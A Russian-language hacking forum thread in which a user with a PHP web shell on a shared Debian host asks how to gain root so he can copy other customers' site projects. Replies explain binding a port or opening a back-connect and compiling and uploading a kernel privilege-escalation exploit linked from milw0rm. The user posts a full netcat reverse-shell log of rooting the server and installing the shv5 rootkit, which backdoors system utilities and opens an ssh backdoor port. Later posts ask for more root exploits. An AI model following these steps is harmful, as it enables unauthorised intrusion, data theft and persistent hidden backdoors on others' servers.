На сервере есть шелл Safe_Mode = OFF
Могу ходить по папкам только текущего домена, видны папки соседних доменов, но зайти не могу, рубит права. Вот конфигурации из шела

Ядрышко:
Linux 2.6.26-2-amd64 #1 SMP Fri Mar 27 04:02:59 UTC 2009 x86_64
Пыха: PHP/5.2.9-4
Апачка: 2.2.12 (Debian)

Заранее благодарю за помощь!

Ставишь биндпорт \ устанавливаешь бекконект,
Проверяешь, можно ли заюзать gcc (gcc --help), если нельзя - компилишь на похожем сервере с учетом путей (если используются), заливаешь на сервер, запускаешь.

http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz

// вообще надо задавать более конкретные вопросы.

Вот ещё один вопрос. Как юзать такого рода шелы? Я создавал тему с таким вопросом, но её по какой-то неизвестной мне причине удалили. Заранее спасибо за ответ.

// вообще надо задавать более конкретные вопросы.
Вот с этого и начнем. В чем проблема? Не запускается? Не знаешь команды? Не знаешь вообще зачем это? Тогда для начала RTFM, потом с более конкретными проблемами обратно на форум.

В том то и дело что нигде конкретно не нашел что именно делать, куда заливать. как запускать. Команды поискать не сложно. И не понял как биндить порт. В шелле когда делаешь через perl пишет, что не найден какой-то скрипт.

В том то и дело что нигде конкретно не нашел что именно делать, куда заливать. как запускать. Команды поискать не сложно. И не понял как биндить порт. В шелле когда делаешь через perl пишет, что не найден какой-то скрипт.
http://forum.antichat.ru/threadnav17581-1-10.html
https://forum.antichat.ru/showthread.php?t=30711
если постараться можно еще и видео найти но эт помойму уже лишнее, а вообше над просто искать нормально :)

Xack-Zero, зачем тебе рут тогда, если ты ничего не умеешь?

Просто на сервере лежат очень хорошие проекты сайтов. Хочу сделать их рип, но права не позволяют.

P.S. Шелл madshell99 такая проблема. Ввожу я команды, но ответ от сервера не получаю. Просто выходит окно, где внизу сама команда а вверху пусто. Ни при unname -a ничего не получаю в ответ ни при любой другой.


P.P.S: порт забиндил, продвигаюсь дальше, но всё равно на будущее вопрос. Почему сервер не отвечает шеллу?

И снова ногами в жир =/ Сначала не нашел команду curl заменил её командой wget закачал всё это дело, затем начал компилить сплойт, он грит что не найдена команда gcc. Выше BlackSun писал, что можно скомпилировать это дело на другом сервере с учётом путей целевого сервера. А как это можно сделать? Сменить пути например на нужные.

Найти сервак с такой же архитектурой и установленным gcc, скомпилить там, затем залить бинарник на целевой хост и запустить

шелл в личку с возможностью открыть бекконект и я попробую порутать.

Вобщем при получении руткита вот что выползает


C:\nc1>nc dhfcfghity.net 32767
bash: no job control in this shell
dbvncbnity@www:/home/dnfhshrfdgcity/data/www/dnepfdgрrcity.net/forum/customprofilepics$ cd
linux-sendpage3
dnedgdsdfgcity@www:/home/dneprasdcsfadity/data/www/dasdfneprcitdfsfsay.net/forum/customprofilepics/linux-sendpage3$ ./start
sh: no job control in this shell
sh-3.2# tar -xvf /home/dnefdghdfprcity/data/www/dnfedsfpgdfrcity.net/forum/customprofilepics/
shV5.tgz
shv5/
shv5/setup
shv5/README
shv5/lib.tgz
shv5/conf.tgz
shv5/bin.tgz
shv5/utilz.tgz
sh-3.2# cd shv/
sh: cd: shv/: No such file or directory
sh-3.2# cd shv5/
sh-3.2# ./setup 1074963 4321
←[0;36m[←[1;37msh←[0;36m]# Installing shv5 ... this wont take long ←[0m
←[0;36m[←[1;37msh←[0;36m]# If u think we will patch your holes shoot yourself !←
[0m
←[0;36m[←[1;37msh←[0;36m]# so patch manualy and fuck off! ←[0m


←[1;37m============================================= ============================
===←[0m

←[0;36m MMMMM MMMMMM
MMM MMMMMMMMM MMMM MMMM MMM Presenting u shv5-rootkit !
MMM MMMM MMMM MMMM MMMM MMM Designed for internal use !
MMM MMMMMMM MMMMMMMMMMMM MMM
MMM MMMMMMMM MMMMMMMMMMMM MMM brought to you by: PinT[x]
MMM MMMM MMMM MMMM MMM April й 2003 й
MMM MMMM MMMM MMMM MMMM MMM
MMM MMMMMMMMM MMMM MMMM MMM *** VERY PRIVATE ***
MMM MMM *** so dont distribute ***
MMMMM -C- -R- -E- -W- MMMMMM
←[0m

←[1;37m============================================= ============================
===←[0m

←[0;36m[←[1;37msh←[0;36m]# backdooring started on ←[1;37mwww.uzyuuya.ua←[0m
←[0;36m[←[1;37msh←[0;36m]#
←[0m
←[0;36m[←[1;37msh←[0;36m]#
←[0m
←[0;36m[←[1;37msh←[0;36m]# checking for remote logging... ←[0mgrep: /etc/syslog.
conf: No such file or directory
←[1;37m guess not.←[0m
←[0;36m[←[1;37msh←[0;36m]# checking for tripwire... ←[0m←[1;37m guess not. ←[0m
←[0;36m[←[1;37msh←[0;36m]# [Installing trojans....]
←[1;34m ←[0m
mv: cannot stat `lib/libproc.so.2.0.6': No such file or directory
←[0;36m[←[1;37msh←[0;36m]# Using Password : ←[1;37m12193
←[1;34m ←[0m
←[0;36m[←[1;37msh←[0;36m]# Using ssh-port : ←[1;37m4321
←[0m
mkdir: cannot create directory `/usr/lib/libsh': File exists
mkdir: cannot create directory `/usr/lib/libsh/.backup': File exists
mv: cannot stat `top': No such file or directory
←[0;36m[←[1;37msh←[0;36m]# : ps/ls/top/netstat/ifconfig/find/ and rest
backdoored←[0m
←[0;36m[←[1;37msh←[0;36m]#
←[0m
←[0;36m[←[1;37msh←[0;36m]# [Installing some utils...]
←[0m
←[0;36m[←[1;37msh←[0;36m]# : mirk/synscan/others... moved
←[0m
←[0;36m[←[1;37msh←[0;36m]# [Moving our files...]
←[0m
mkdir: cannot create directory `/usr/lib/libsh/.sniff': File exists
mv: cannot stat `/home/fgdfhnfeghprcity/data/www/dngepfgrdcfity.net/forum/customprofilepics/
linux-sendpage3/shv5/bin/shsniff': No such file or directory
mv: cannot stat `/home/dneghpjhrcjhity/data/www/dnhrfcfiftfy.net/forum/customprofilepics/
linux-sendpage3/shv5/bin/shp': No such file or directory
mv: cannot stat `/home/dnfgrjckihtgy/data/www/dnehjphrjcjigtfy.net/forum/customprofilepics/
linux-sendpage3/shv5/bin/shsb': No such file or directory
chmod: cannot access `/usr/lib/libsh/.sniff/*': No such file or directory
chmod: cannot access `/usr/lib/libsh/shsb': No such file or directory
←[0;36m[←[1;37msh←[0;36m]# : sniff/parse/sauber/hide moved
←[0m
←[0;36m[←[1;37msh←[0;36m]# [Modifying system settings to suite our needs]
←[0m
←[0;36m[←[1;37msh←[0;36m]# Checking for vuln-daemons ... ←[0m

ps: error while loading shared libraries: libproc.so.2.0.6: cannot open shared o
bject file: No such file or directory
mkdir: cannot create directory `/usr/lib/libsh/.owned': File exists
touch: failed to get attributes of `/etc/inted.conf': No such file or directory
←[1;37m--------------------------------------------------------------------←[0m
←[0;36m[←[1;37msh←[0;36m]# [System Information...]←[0m
←[0;36m[←[1;37msh←[0;36m]# Hostname :←[1;37m www.bghvba.ua (91.200.42.14)←[0m

←[0;36m[←[1;37msh←[0;36m]# Arch : ←[1;37m2009 -+- bogomips : 5576.18
5571.93 '←[0m
←[0;36m[←[1;37msh←[0;36m]# Alternative IP :←[1;37m 91.200.42.14 -+- Might be [3
] active adapters.←[0m
←[0;36m[←[1;37msh←[0;36m]# Distribution:←[1;37m squeeze/sid←[0m
←[1;37m--------------------------------------------------------------------←[0m
←[0;36m[←[1;37msh←[0;36m]# ipchains ... ? ←[0m

←[0;36m[←[1;37msh←[0;36m]# lucky for u no ipchains found←[0m
←[1;37m--------------------------------------------------------------------←[0m
←[0;36m[←[1;37msh←[0;36m]# iptables ...?←[0m
iptables: No chain/target/match by that name.
←[1;37m←[0m
←[1;37m--------------------------------------------------------------------←[0m
←[0;36m[←[1;37msh←[0;36m]# Just ignore all errors if any !
←[0;36m[←[1;37msh←[0;36m]# ============================== ←[1;31mBackdooring com
pleted in :3 seconds ←[0m
./setup: line 813: /sbin/syslogd: No such file or directory
sh-3.2#


p.s. Адреса в целях безопасности поменял в тексте. Вобщем вопрос, почему ошибка?

он у тя по каким то причинам неможет создать свои файлы, а у тя точно права есть?

Да, запускал эксплойт который советовал BlackSun предварительно скомпилировав его, затем командой id мне показало что я root и мой id везде 0

оооч старенький руткит, мб в этом дело?))

Какой сплоит посоветуете для повышения привелегий на FreeBSD 6.3-STABLE

На милворме ищи.

Сколько смотрел абсолютно все выбивают ошибки. Вероятно там специально они сделаны, но в их исправлении я не силен, можно так сказать вообще 0.

Покажи какие ты нашел, я под фри вообще ни одного повышения прав 6.4 не увидел.

Ой пардон тупанул. Повышение прав есть, а на версию не глянул что-то =/

Есть на
http://www.frasunek.com/
Но у меня не компилится
/var/tmp//ccvFZKNm.s: Assembler messages:
/var/tmp//ccvFZKNm.s:20: Error: Incorrect register `%rax' used with `l' su
Я так понимаю, архитектура не подходит. Буду признателен за ответ.

Подскажите сплойт, не могу найти под такую же версию версию ядра.
Только, насколько я понял, у меня Дебиан стоит.
Linux ix 2.6.26-2-vserver-686-bigmem #1 SMP Fri Aug 14 03:35:51 UTC 2009 i686 GNU/Linux
linux-gnu
Apache/2.2.9 (Debian) mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0